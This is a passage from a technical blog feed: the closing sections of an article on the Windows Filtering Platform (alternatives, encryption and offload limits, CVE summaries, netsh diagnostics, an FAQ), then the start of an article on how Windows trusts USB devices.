Hyper-V Extensible Switch. Since Windows 8 / Server 2012, "the Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012," and the switch supports extensible-switch extensions that "bind within the extensible switch driver stack" [@hyperv-extswitch]. WFP filters and callouts can be placed at vSwitch ingress and egress [@wfp-whatsnew].
Microsoft Defender for Endpoint Network Protection. The Microsoft Learn page documents the capability: "Network Protection will block connections on all ports (not just 80 and 443)" [@mde-netprot]. The product enforces SmartScreen domain reputation across the entire process tree, not just the browser. The exact WFP-layer registration map is not publicly documented; Section 9 returns to it."The exact WFP-layer registration map for Microsoft Defender for Endpoint Network Protection is not publicly documented." This is one of the rare honest-disclosure moments in the WFP story. Microsoft has published the capability [@mde-netprot] but has not published the exact set of FWPM_LAYER_* identifiers Network Protection registers callouts at. Community reverse engineering knows fragments of the map. Section 9 treats this as an open engineering problem.
Third-party EDR network filters. CrowdStrike Falcon, SentinelOne, Cisco Secure Endpoint, ESET, Sophos, and the rest of the EDR vendor list ship WFP callout drivers as the standard kernel-side primitive for network telemetry and policy enforcement. There is no single Microsoft document that lists them. Forshaw's 2021 Project Zero post is the closest a primary source comes to acknowledging that this is how the industry has settled [@forshaw-2021].

The textbook reference for WFP architecture is *Windows Internals, Part 2*, 7th edition, by Russinovich, Solomon, Ionescu, Yosifovich, and Allievi (Microsoft Press, 2021) [@windows-internals-7th]. The book's Networking chapter walks through TCP/IP driver internals and WFP architecture together, including the filter-engine / BFE / shim taxonomy this article has used. Treat the book as the slow-read complement to the Microsoft Learn references; the chapter does not duplicate the Learn pages, it explains why the architecture chose the shape it did. Page numbers vary by printing; cite by chapter heading.

Five downstream features on one engine. So what are the alternatives, if you want to ship a kernel-mode network filter on Windows today and do not want to use WFP?

7. Competing Approaches -- LWF, eBPF, Extensible Switch, and the Azure VFP

WFP is the L3+ answer. What else is there to attach to?

NDIS Lightweight Filter (LWF). The L2 sibling. NDIS 6.0, shipped with Vista, introduced "NDIS filter drivers. Filter drivers can monitor and modify the interaction between protocol drivers and miniport drivers. Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. LWF is the modern replacement for NDIS 5.x intermediate drivers. It sits below the protocol stack, sees raw Ethernet frames, has no application identity, and is the right choice for raw L2 work: VLAN tagging, EAPoL, packet capture (Npcap, NMNT). Choose LWF over WFP when you need pre-IP visibility and no per-process identity.

A kernel filter driver registered with NDIS that monitors or modifies the path between a protocol driver and a miniport driver. LWF replaced NDIS 5.x intermediate drivers starting with NDIS 6.0 [@ndis-filter]. LWF drivers see Ethernet frames before any IP processing has happened. They cannot see application identity, since the OS does not yet know which process the frame belongs to.

Hyper-V Extensible Switch extensions. A specialised NDIS LWF profile. NDIS 6.30, Windows Server 2012. "The Hyper-V extensible switch supports an interface that allows instances of NDIS filter drivers (known as extensible switch extensions) to bind within the extensible switch driver stack... The Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012" [@hyperv-extswitch]. Extensions come in three roles -- capture, filter, and forwarding -- with one forwarding-extension slot per vSwitch. Choose extensible switch extensions for Hyper-V Network Virtualization, software-defined-networking overlays, or SR-IOV gating.

eBPF for Windows. A Microsoft-sponsored project to bring the Linux eBPF programming model to Windows. The GitHub README describes its scope as letting existing eBPF toolchains and APIs familiar from Linux be used on top of Windows, and frames the project as a work-in-progress [@ebpf-readme]. Three deployment modes: native ("PREVAIL verifier... bpf2c tool converts every instruction in the bytecode to equivalent C statements... built into a windows driver module (stored in a .sys file)... This is the preferred way of deploying eBPF programs" [@ebpf-readme]); JIT (user-mode service, "with HVCI enabled, eBPF programs cannot be JIT compiled, but can be run in the native mode" [@ebpf-readme]); and interpreter (debug only). The hooks the project exposes (XDP, BIND, SOCK_ADDR, SOCK_OPS, CGROUP_SOCK_ADDR) are the Linux-flavoured analogues of the WFP shim points. The v1.1.0 release, published in March 2026 and labelled "first stable" while still tagged Pre-release, "added hard/soft permit verdicts" to its accept and bind hooks -- explicitly mirroring the WFP FWPS_RIGHT_ACTION_WRITE model [@ebpf-releases]. The project's own pages page repeats the work-in-progress framing [@ebpf-pages]. Choose eBPF for Windows for pre-stack DDoS scrubbing or cross-platform observability prototypes; the production-readiness caveat applies.

A Microsoft-sponsored open-source project that ports the Linux eBPF execution and toolchain to Windows. The native deployment mode compiles eBPF bytecode through PREVAIL verification and the `bpf2c` translator into a signed `.sys` kernel driver, which preserves HVCI compatibility [@ebpf-readme]. As of the v1.1.0 release (March 2026), the project remains tagged Pre-release on GitHub [@ebpf-releases].

Azure VFP -- a name collision that requires disambiguation. The Azure host-SDN data plane, presented by Daniel Firestone at NSDI 2017 [@firestone-nsdi17], is called the Virtual Filtering Platform. Same initials shape as WFP. Different platform. VFP is the programmable virtual switch that runs on every Azure compute host; the NSDI 2017 abstract notes that "VFP has been deployed on >1M hosts running IaaS and PaaS workloads for over 4 years" [@firestone-nsdi17]. It uses match-action tables, layers (the word "layer" appears with a different semantic from WFP's), Unified Flow Tables, and AccelNet FPGA offload via the Generic Flow Table. VFP ships with Azure, on Azure hosts. It is not customer-buildable on a Windows desktop, and Windows desktop and Server SKUs do not run it. The platforms are unrelated despite the name overlap.

Note: The Azure Virtual Filtering Platform (VFP), introduced in Firestone's NSDI 2017 paper, is the Azure host SDN data plane and shares only an acronym shape with the Windows Filtering Platform [@firestone-nsdi17]. VFP runs on Azure hosts under the Hyper-V Extensible Switch and is the layer that powers SLB, NSGs, AccelNet, and Azure Virtual Network. It is unrelated to the WFP filter engine, BFE, or fwpkclnt.sys. If the title of your inquiry contains both names, you are almost certainly looking at one or the other; the focus-premise audit in this article's source notes flagged the original input's mention of "SecureNAT" as similar terminological drift that led to the wrong product.

Approach	Layer / scope	App identity	Best for
WFP callout driver	L3+ across approximately sixty `FWPM_LAYER_*` IDs [@wfp-layers]	Yes via ALE [@wfp-ale]	App-aware on-host filtering and EDR telemetry
NDIS LWF	L2, below the protocol stack [@ndis-filter]	No	Raw L2: capture, VLAN, EAPoL
Hyper-V Extensible Switch ext	Inside the vSwitch, NDIS 6.30+ [@hyperv-extswitch]	Per-VM, not per-process	Hyper-V network virtualization, SDN overlays
eBPF for Windows	XDP / BIND / SOCK_ADDR hooks [@ebpf-readme]	Partial	Pre-stack DDoS, cross-platform observability prototypes (Pre-release)
Azure VFP	Azure host SDN; not customer-buildable [@firestone-nsdi17]	N/A	Azure-host SDN policy (Microsoft-internal)

None of these displaces WFP for the dominant on-host case (application-identity-aware, IPsec-integrated, stateful, multi-vendor-arbitrated). And all of them share one limit -- a limit that is built into the laws of network physics, not into Microsoft's roadmap.

8. Three Ceilings -- Encryption, Offload, Kernel EoP

Three ceilings sit above WFP and every alternative listed above. None is a Microsoft bug. All are structural.

The encryption ceiling

A WFP callout at the stream layer sees plaintext only if the payload was never encrypted, or if it was encrypted by a key the kernel owns (IPsec).IPsec is the one case where the kernel does hold the keys, because the IKE/AuthIP keying modules that BFE plumbs to are themselves Windows components [@wfp-about]. Every other in-process TLS or QUIC stack keeps its keys away from the kernel. TLS 1.3 and QUIC are end-to-end encrypted from the callout's point of view; the keys are inside the application's user-mode TLS library. A callout that registers at FWPM_LAYER_STREAM_V4 and reads bytes off a Chrome HTTPS connection sees ciphertext.

The case is even sharper for QUIC. QUIC runs over UDP. From the first packet, almost all of the QUIC control plane is encrypted with a key derived from the connection's initial secret. A datagram-layer callout that wants to inspect the QUIC handshake -- not the payload, just the handshake -- cannot. Microsoft's own product team has acknowledged the limit in plain English on the Defender for Endpoint Network Protection page:

Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers. -- Microsoft Defender for Endpoint, *Network Protection* [@mde-netprot]

That sentence is the encryption ceiling in Microsoft's own words. The product can block by 5-tuple (IP, port, protocol). It cannot block by hostname inside an Edge tab over QUIC unless QUIC is disabled in that browser. The limit is information-theoretic: a kernel filter without the session keys cannot read the encrypted payload. No engineering changes in WFP can lift it. The fix lives in the browser or in a user-mode TLS-inspecting proxy.

The offload ceiling

The second ceiling came from hardware. Modern NICs do work that the kernel used to do, because doing it in hardware is faster. UDP Receive Segment Coalescing Offload, the marquee feature of NDIS 6.89 in Windows 11 24H2, is the cleanest example: "URO enables network interface cards (NICs) to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@uro].

The "logically contiguous buffer" is the problem. A WFP callout written against the pre-URO semantics ("one indication at FWPM_LAYER_DATAGRAM_DATA_V4 is one UDP datagram") is silently wrong on a system where the NIC has coalesced several datagrams into one Network Buffer List. The callout that needs per-datagram inspection has to read NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO to learn the per-flow size and unfold the indication accordingly [@uro]. The mechanical bound is that work the NIC has aggregated has lost its per-packet boundary by the time the kernel sees it.

Note: A callout at FWPM_LAYER_DATAGRAM_DATA_V4 or _V6 that assumes "one NBL = one datagram" is silently wrong on Windows 11 24H2 systems with URO-capable NICs. Read the per-flow size from NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO and iterate. The change is documented in the URO reference page [@uro], but legacy callouts written before NDIS 6.89 will need an explicit audit.

The same shape repeats for TCP segmentation offload (TSO, LSO), receive offload (LRO, GRO), and TLS / IPsec / RDMA / VxLAN / GENEVE offload. Each one moves work to hardware. Each one weakens the kernel-filter assumption that "every packet flows past every layer."

The kernel attack surface

The third ceiling is the one that drives the CVE cadence. Every callout is a kernel module [@wfp-callouts]. Every byte that crosses the Fwpm* user-to-kernel boundary is a potential primitive for an elevation-of-privilege exploit [@nvd-2023-29368][@nvd-2024-38034]. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free in the WFP code path with a CVSS base of 7.0 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.0, and an impact sub-score of 5.9 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow in the same family of code paths with a CVSS base of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.8, and an impact sub-score of 5.9 [@nvd-2024-38034].

The CVSS vector difference is worth reading carefully.The 2024 vulnerability's attack-complexity dropped from AC:H to AC:L. The exploitability sub-score rose from 1.0 to 1.8 over the same window. The 2024 bug is easier to weaponise [@nvd-2023-29368][@nvd-2024-38034]. Without speculating about the trend across a longer time series, the direction of travel between these two anchor CVEs is "down, not up."

There is a structural variant of the same story that does not require any memory-safety bug at all. In August 2021, Forshaw published a Project Zero post titled "Understanding Network Access in Windows AppContainers." The post documents a default-WFP-policy configuration that allows certain low-privilege AppContainer processes to reach the network without any of the capability SIDs (internetClient, internetClientServer, privateNetworkClientServer) that the AppContainer documentation suggests are required [@forshaw-2021]. The associated Project Zero issue, 2207, was marked WontFix by Microsoft; the press coverage at SecurityAffairs reproduces the advisory body verbatim: "The default rules for the WFP connect layers permit certain executables to connect TCP sockets in AppContainers without capabilities leading to elevation of privilege... Eventually an AC process will match the 'Block Outbound Default Rule' rule if nothing else has which will block any connection attempt" [@securityaffairs-2021]. The bug is a policy composition bug, not a code bug. It exists in the way the in-box sublayers, filter weights, and default rules interact -- which is precisely the surface this article spent Section 5 explaining.

Key idea: WFP's hardest limits are not engineering choices Microsoft can rewrite. They are information-theoretic (a kernel filter without session keys cannot read what is encrypted), mechanical (hardware offloads exist to amortise work the kernel filter would have done, and aggregation destroys per-packet ground truth), and structural (every callout is a kernel module, and every Fwpm* call crosses a user-to-kernel ABI). The BFE elevation-of-privilege CVE class is the running cost of a platform sophisticated enough to host every downstream feature Windows ships.

Three ceilings. Is there a structural fix for any of them, or is this what the platform looks like forever?

9. Open Problems -- Where the Engineering Lives

Six questions are live right now. None of them has a clean answer.

QUIC inspection in the kernel. The current best partial result is to block QUIC by 5-tuple and rely on a browser's HTTP/3 fallback to TLS over TCP, where in-box inspection still works. The Defender for Endpoint Network Protection page documents the workaround verbatim: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Anything deeper than 5-tuple inspection on QUIC requires a user-mode proxy that terminates the QUIC connection and re-originates it, which moves the problem out of WFP.

Microsoft Defender for Endpoint's exact WFP-layer registration map. Publicly undocumented. Microsoft has published the capability and the limitations [@mde-netprot] but not the precise set of FWPM_LAYER_* GUIDs that Network Protection registers callouts at. Community reverse engineering knows fragments. A definitive map would let third-party EDR vendors avoid sublayer-priority conflicts with Defender. Whether Microsoft publishes one is a product-roadmap question.

The structural shape of the BFE EoP CVE class. Is the BFE elevation-of-privilege CVE class -- CWE-415 in 2023 [@nvd-2023-29368], CWE-190 in 2024 [@nvd-2024-38034], no public impossibility theorem either way -- tail risk inherent to the platform's policy-from-user-mode-to-kernel design, or is it addressable by an architectural fix (HVCI hardening on fwpkclnt.sys callout paths, bounded ABI contracts on the Fwpm* surface, Rust-in-Windows-kernel for new callout drivers)? The honest answer is that this is open. The integer-overflow / use-after-free class is the canonical attack surface of any user-to-kernel ABI; the question is whether Microsoft commits to a structural fix or to tail-risk-mitigation-plus-patching.

eBPF for Windows production readiness. Does it displace WFP for new kernel-mode network filters, or does it stay adjacent? The v1.1.0 release in March 2026 was framed as "first stable" while still labelled Pre-release [@ebpf-releases]. The same release added hard/soft permit verdicts to its accept and bind hooks, explicitly mirroring FWPS_RIGHT_ACTION_WRITE in WFP [@ebpf-releases]. That borrowing is a tell -- the project is converging on the WFP arbitration semantics, which suggests the long-term picture is "eBPF for Windows alongside WFP" rather than "eBPF replaces WFP." The market answer is unsettled.

Windows Defender Application Guard's egress-isolation pattern after WDAG deprecation. WDAG for Edge used a WFP-backed egress-isolation pattern to route browsing-container traffic out of an isolated network compartment. The WDAG product surface is being phased out -- Microsoft has documented that "Microsoft Defender Application Guard... is deprecated for Microsoft Edge for Business and will no longer be updated. Starting with Windows 11, version 24H2, Microsoft Defender Application Guard... is no longer available" [@mdag-deprecation]. The pattern's future on Windows -- in containers, virtualization-based security profiles, or some successor -- is undocumented as of the time of writing. Treat this paragraph as conjectural until Microsoft publishes a successor pattern.

NIC offload composability with kernel firewalls. As more pipeline elements move into the NIC -- TSO, LSO, GRO/GSO, URO [@uro], TLS offload, IPsec offload, RDMA, VxLAN, GENEVE -- the assumption that every packet flows past every WFP layer weakens. A callout that registers at FWPM_LAYER_INBOUND_TRANSPORT_V4 may never see a packet whose transport-layer work happened entirely on the NIC. The kernel-firewall design that grew up assuming software ground truth has to renegotiate that assumption release by release. NDIS 6.89's URO is the most recent example [@ndis-689]; there will be more.

"Open" in this section means engineering-open, not theory-open. There is no published impossibility theorem stating that WFP cannot be made provably safe against integer-overflow elevation-of-privilege, or that a kernel firewall cannot inspect encrypted traffic with a key-disclosure protocol, or that NIC offloads cannot be composed with kernel-side filters by sharing flow state. The practical question, in every case, is whether Microsoft and the broader Windows community invest in the structural fix or settle for tail-risk-mitigation plus patching. The answer in 2026 is "mostly the latter."

Six open problems. Now, how do you actually use the platform that has been the subject of this article?

10. The Four Ways You Touch WFP

Whether you are an administrator, a detection engineer, or a kernel driver writer, there are four canonical surfaces you actually touch. Here is the field guide.

The diagnostic surface: `netsh wfp`

Wikipedia's WFP page notes the introduction date: "Starting with Windows 7, the netsh command can diagnose of the internal state of WFP" [@wiki-wfp]. The canonical incident-response triplet is three commands long.

Note: Run these three commands, in this order, before doing anything else when a Windows host shows network-filtering behaviour you cannot explain: text netsh wfp show state > state.xml netsh wfp show filters > filters.xml netsh wfp capture start file=C:\Temp\wfp.cab :: reproduce the issue netsh wfp capture stop state.xml is the platform's current rendered configuration: every provider, sublayer, filter, and callout currently registered. filters.xml lists every filter, including effective weight and action. The .cab from netsh wfp capture is the ETW-and-state bundle that goes onto a Microsoft Support case. The netsh wfp family has been around since Windows 7 [@wiki-wfp]; it has not had a major redesign since.

A state.xml from netsh wfp show state is an XML document with one <item> per filter. Each item carries a <displayData> element with a name and description, the layer GUID, the sublayer GUID, the weight, and the action. Reading one is a matter of pattern recognition rather than parsing. The next snippet walks the structure on a hand-pasted fragment.

{ // A real-world 'netsh wfp show state' output contains many <item> elements // inside <filters>. The fragment below is a single filter, hand-pasted from // a 'show state' XML dump. const xmlFragment = \ {deadbeef-1111-2222-3333-444455556666} EDR-vendor outbound TCP inspect Vendor X deep-inspection callout filter FWPM_LAYER_ALE_AUTH_CONNECT_V4 {a0192d10-aaaa-bbbb-cccc-1234567890ab} FWP_UINT64 0x4000000000000064 FWP_ACTION_CALLOUT_INSPECTION `;

console.log(readFilter(xmlFragment)); // { // name: 'EDR-vendor outbound TCP inspect', // layer: 'FWPM_LAYER_ALE_AUTH_CONNECT_V4', // subLayer: '{a0192d10-aaaa-bbbb-cccc-1234567890ab}', // weight: '0x4000000000000064', // action: 'FWP_ACTION_CALLOUT_INSPECTION' // } `}

Five fields: name, layer, sublayer, weight, action. That is what every WFP filter resolves to. Reading a hundred of them takes an afternoon.

The administrative surface: `wf.msc`

The Microsoft Management Console snap-in is the surface most Windows users have actually clicked. Every rule created in wf.msc is translated by the MpsSvc service into a WFP filter and pushed into the BFE's MPSSVC provider sublayer over RPC, and from there into TCPIP.SYS in the kernel [@forshaw-2021]. The UI exposes a small fraction of the filter properties WFP actually models; advanced rule attributes (per-AppContainer SID, per-package family name, per-service hardening) live in the underlying filter only.

The networking surface: `New-NetNat` and Hyper-V NAT switches

The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]. Each NAT object materialises as a set of WFP filters that perform the translation. Windows containers use the same machinery for their default NAT switch. The Get-NetNat, Remove-NetNat, and related cmdlets in the NetNat PowerShell module are the entry point.

The driver surface: writing a WFP callout

The WDK's "Introduction to Windows Filtering Platform Callout Drivers" page is the entry point for kernel-mode writers [@wfp-callouts]. The reference sample, WFPSampler, lives in the microsoft/Windows-driver-samples repository under network/trans/WFPSampler. The sample's description: "The WFPSampler sample driver is a sample firewall. It has a command-line interface which allows adding filters at various WFP layers with a wide variety of conditions. Additionally it exposes callout functions for injection, basic action, proxying, and stream inspection" [@wfpsampler]. The sample ships five components: WFPSampler.Exe, WFPSamplerService.Exe, WFPSamplerCalloutDriver.Sys, WFPSamplerProxyService.Exe, and the two libraries WFPSampler.Lib / WFPSamplerSys.Lib.If you install WFPSampler and the installer refuses to register without a reboot prompt, the README documents a workaround: run RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 131 wfpsampler.inf (note the 131), and RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 132 wfpsampler.inf for the corresponding uninstall codepath [@wfpsampler]. The 131/132 flags suppress the reboot prompt for the in-tree sample driver.

A WFP callout driver that originates kernel-mode network I/O should pair with Winsock Kernel.

"Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. WSK is the modern replacement for TDI as the kernel-mode sockets API on Windows Vista and later. Microsoft's WSK introduction makes the split explicit: "Filter drivers should implement the Windows Filtering Platform on Windows Vista, and TDI clients should implement WSK" [@wsk-intro]. WFP filters traffic. WSK opens sockets from inside the kernel. The two interfaces are siblings. Before writing a callout driver, ask: does the policy need per-packet kernel visibility, or would a user-mode service that consumes ETW events from `Microsoft-Windows-WFP` and the firewall's ETW providers be enough? Most logging and detection use cases are answered by ETW. A callout driver is justified when you need to *act on* traffic (drop, redirect, modify, inspect payload), not just *observe* it. The kernel attack surface that comes with a callout, documented in Section 8, is now yours to share once you ship.

The detection-engineering surface lives in ETW. The two providers to know are Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall With Advanced Security. Names are not enough to do the full subject justice; the cross-reference footer below points at the dedicated ETW article in this series.

You now have a mental map of every place WFP touches a Windows host -- under the firewall UI, under IPsec, under WinNAT, under the Hyper-V vSwitch, under Defender for Endpoint, under every EDR. The FAQ disarms the last eight misconceptions.

11. Frequently Asked Questions

No. WFP is the platform; the Windows Firewall (WFAS, service name `MpsSvc`) is one consumer of it. Microsoft's start page makes the relationship explicit: "Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The Base Filtering Engine service (`bfe`) hosts the user-mode side of WFP and accepts policy from `MpsSvc` over RPC [@forshaw-2021]. Two user-mode services and a kernel-mode classification path, one platform. No. `fwpkclnt.sys` is the kernel-mode WFP client and export driver. Callout drivers link against `fwpkclnt.lib`, whose in-memory form is `fwpkclnt.sys` [@wfp-arch]. The classification path -- the code that walks sublayers and filters -- runs primarily inside `NETIO.SYS`, as Forshaw documents in his Project Zero post [@forshaw-2021]. The shorthand "`fwpkclnt.sys` is the filter engine" is common online and incorrect. No. BFE (service name `bfe`) is the Base Filtering Engine -- the platform service that controls WFP and plumbs configuration to other modules, including IPsec keying [@wfp-about]. `MpsSvc` is the Windows Defender Firewall service. `MpsSvc` depends on `bfe`; the dependency is not reciprocal [@forshaw-2021]. No. WFP callouts see plaintext only for non-IPsec, non-TLS payloads, or for IPsec traffic where the kernel holds the keys. TLS 1.3 and QUIC are end-to-end encrypted from a callout's perspective; the keys live in user-mode TLS libraries inside the application. Microsoft's own Defender for Endpoint Network Protection documentation acknowledges the limit: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Section 8 calls this the encryption ceiling. No. SecureNAT is an ISA Server / Forefront Threat Management Gateway concept, retired with TMG. The modern Windows-host NAT on WFP is **WinNAT**, managed by the `New-NetNat` PowerShell cmdlet [@netnat]. Windows containers use WinNAT for their default NAT switch. The original input scope that informed this article erroneously referenced "SecureNAT" as a WFP consumer; the focus-premise audit corrected it to WinNAT before drafting began. No. WSK is **Winsock Kernel**. Microsoft Learn's introduction is unambiguous: "Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. The two-letter prefix is "Winsock," the original Windows Sockets API brand, not "Windows Sockets." No. CVE-2024-21318 is a Microsoft SharePoint Server deserialization remote code execution vulnerability, unrelated to the Base Filtering Engine. The 2024 WFP elevation-of-privilege vulnerability is **CVE-2024-38034**: a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The article's source-verification stage flagged the original scope's CVE attribution error before drafting; the article tracks CVE-2024-38034 and CVE-2023-29368 as the two anchor BFE CVEs. Only at the 5-tuple level (IP, port, protocol) before or after a connection establishes. Once a QUIC connection is up, the encryption ceiling applies and the kernel has no key for the encrypted payload [@mde-netprot]. FQDN-level blocking of QUIC over Network Protection requires QUIC to be disabled in the browser, per Microsoft's own troubleshooting guide [@mde-netprot]. Deep inspection of QUIC content from the kernel is not possible with WFP alone.

See also. The Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall ETW providers are how detection-engineering teams see WFP from outside the kernel; the dedicated ETW article in this series goes deeper on the provider names, manifests, and parsing. The Antimalware Scan Interface (AMSI) sits on the process-side path that complements WFP's network-side path; the two are siblings, not substitutes. And the \Device\Ipfilterdriver device object that this article retired in Section 3 lives in the Windows Object Manager namespace, whose architecture is the subject of the Object Manager article in this series.

Plug and Trust: How Windows Decides What to Do When You Plug In a USB Device

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Plugging a USB device into Windows is the single most-trusted action a user routinely performs on an operating system that verifies every byte of code it loads. In a few hundred milliseconds (typically 200-300 ms when the driver is already in the local store; longer on a first-time Windows Update fetch), Windows executes ten or eleven kernel-mode operations (eleven for composite devices) and trusts about 256 bytes of self-described descriptors to decide which driver runs. This article walks that pipeline end-to-end on Windows 11 25H2: the descriptor parser surface, the Plug-and-Play rank algorithm, Kernel-Mode Code Signing and Kernel DMA Protection, BadUSB and Thunderclap, and the five structural limits Windows cannot close without breaking USB compatibility.

1. The Thirty-Second Trust Decision

A user plugs a USB-C thumb drive into a Windows 11 25H2 corporate laptop at 10:42:17 in the morning. Roughly a quarter-second later, the operating system has executed ten or eleven kernel-mode operations (eleven for composite devices) to decide what kind of device it is and which driver to load.The "quarter-second" is editorial framing, not a spec-mandated deadline. The only piece USB-IF actually fixes is the 100 ms attach-debounce window T_ATTDB defined in the USB 2.0 specification §7.1.7.3 (Connect and Disconnect Signaling) [@usb-2-0-spec]; the rest of the budget is implementation-dependent. A typical USB 2.0 thumb drive on a 2024-era xHCI controller, with the function driver already in the local store, lands in the 200-300 ms range. A first-time Windows Update fetch, a slow descriptor read, or a multi-configuration device can stretch it to a second or more. None of those eleven operations consulted the user. None of them verified a cryptographic signature from the peripheral. The entire decision rests on roughly 256 bytes of self-described metadata that the device handed the host on insertion.

Here is the sequence, in the order Windows executes it:

Port-status-change interrupt fires on the xHCI host controller.
The host controller's driver issues a port reset.
Downstream-port speed detection runs: Low, Full, High, Super, or Super+ Speed.
The hub addresses the device at the default address (zero) and asks for the first eight bytes of the USB_DEVICE_DESCRIPTOR.
SET_ADDRESS assigns a non-default bus address.
The hub fetches the full eighteen-byte device descriptor.
The hub fetches the configuration descriptor, including all interface and endpoint sub-descriptors.
If the descriptor indicates a composite device, the generic parent splits it into per-interface child devices.
The Plug-and-Play manager synthesizes hardware IDs and compatible IDs from the descriptor fields.
The driver-store INF database is searched with a rank-scored matching algorithm; the chosen driver is verified against the Kernel-Mode Code Signing policy.
The class driver attaches to the new device node and begins serving I/O.

Microsoft's own architecture documentation confirms the pipeline: the xHCI host controller driver, the host-controller extension, and the hub driver -- usbhub3.sys, the binary that enumerates devices and creates physical device objects -- are all KMDF-based [@ms-usb-3-0-stack]. The rank-scored INF match comes straight from the Plug-and-Play manager's documented behavior [@ms-pnp-rank]. The signature check is governed by the same Kernel-Mode Code Signing policy that has gated every kernel driver since 64-bit Windows Vista shipped in 2007 [@ms-kmcs].

Key idea: Ten or eleven kernel-mode operations (eleven for composite devices). Zero human decisions. Roughly 256 bytes of self-described metadata. That is the size of the trust gap between physical insertion and the moment a class driver begins reading and writing data inside the Windows kernel.

The load-bearing primitive in that pipeline is the USB descriptor: a small block of bytes the peripheral emits when asked, naming what kind of device it claims to be, who claims to have made it, and what features it claims to support. Windows must trust those bytes to choose a driver. There is no out-of-band channel to verify them. There is no signature on the descriptor itself.

This article is a walk through what Windows does verify, what it cannot verify, and where the gap lives. The trust posture is older than USB itself, and the failure modes are older than Windows 2000. We will start with the inheritance.

2. The Pre-USB Removable-Media Trust Model

A user in Lahore inserts a 5.25-inch floppy into an IBM PC clone. Whatever 512 bytes sit at sector zero of that diskette will execute as part of the operating-system boot path before any code that came with the machine runs. The trust model Windows still uses for USB peripherals in 2026 was carved into silicon that year.

The IBM PC's boot ROM, by design, copied sector zero of whatever bootable medium was present into memory and jumped to it. That contract -- inserted media is trusted media -- shipped in 1981 and was demonstrated as catastrophic within five years. The Brain virus appeared in 1986 [@wiki-brain]; Stoned in 1987 [@wiki-stoned]; Michelangelo was first discovered on 3 February 1991 in Australia and produced its global panic on March 6, 1992 [@wiki-michelangelo]. Each one used the boot-sector primitive that Wikipedia's standard reference on boot sectors documents [@wiki-bootsector].The Brain virus shipped with a literal copyright notice in the boot sector, naming the Alvi brothers and giving an address in Lahore: a piece of self-documenting malware authored when virus authors did not yet expect to be prosecuted. The address-and-phone-number pattern is a recurring forensic curiosity from the 1986-1990 era.

A USB descriptor is a small, structured block of bytes that a USB peripheral returns when the host asks for it. There are five standard descriptor types in the USB 1.0 specification (device, configuration, string, interface, endpoint) and several class-specific descriptors (HID report descriptors, audio control units, mass-storage CSW formats) layered on top. The device descriptor names a vendor ID, a product ID, a device class, and the maximum packet size for the default control pipe. The string descriptors carry the human-readable manufacturer, product, and serial-number text that Windows displays in Device Manager and that Defender for Endpoint per-serial allow-lists key on. The host has no out-of-band channel to verify any of these fields; the peripheral's self-declaration *is* its identity for the purpose of driver selection.

Microsoft inherited the contract from DOS and refined it. AutoRun, which the Wikipedia reference documents verbatim, "was introduced in Windows 95 to ease application installation for non-technical users and reduce the cost of software support calls ... a feature of Windows Explorer (actually of the shell32 dll) ... enables media and devices to launch programs by use of command listed in a file called autorun.inf, stored in the root directory of the medium" [@wiki-autorun]. Windows 95 RTMed on August 24, 1995. The original design intent was CD-ROM application installation -- read-only optical media, written once at the factory, shipped in a sealed jewel case. The trust assumption matched the physical reality.

Four months after Windows 95 shipped, the USB Implementers Forum was formed. Wikipedia preserves the date and the founder list verbatim: "The USB-IF was initiated on December 5, 1995, by the group of companies that was developing USB ... Compaq, Digital Equipment Corporation, IBM, Intel, Microsoft, NEC and Nortel" [@wiki-usbif]. Microsoft was a co-author of the contract that would govern peripheral trust on every Windows machine for the next thirty years.

A Vendor ID is a 16-bit number that the USB Implementers Forum sells to a device manufacturer for a one-time \$6,000 fee [@wiki-usbif]. A Product ID is a 16-bit number the manufacturer assigns to a specific product within their VID space. The pair forms the most-specific hardware ID Windows uses to select a USB driver, in the form `USB\VID_xxxx&PID_xxxx`. The USB-IF Vendor-ID fee is the only economic gate between an arbitrary firmware author and a "trusted" identity in Windows's driver-store search; it is not a cryptographic gate of any kind.

The first complete USB specification followed quickly. Wikipedia's USB article puts it verbatim: "Designed January 1996 ... Produced Since May 1996 ... Designer: Compaq, DEC, IBM, Intel, Microsoft, NEC, Nortel" [@wiki-usb]. USB 1.0 defined the five standard descriptors, the bus enumeration handshake, and -- the load-bearing architectural choice -- the device-class architecture in which the peripheral declares its own class, subclass, and protocol. A USB keyboard reports bInterfaceClass=0x03 (HID) because it says it is a keyboard. The host has no other source of that fact.

Three years later, the protocol's storage cousin arrived. The USB Mass Storage Class Bulk-Only Transport, Revision 1.0, was published in September 1999 [@usb-massbulk-pdf]. That specification is the protocol on which Windows 2000's usbstor.sys and every modern thumb-drive driver are built. It defines a stripped-down SCSI command set tunneled over USB bulk endpoints; it does not define any peripheral-authentication mechanism.

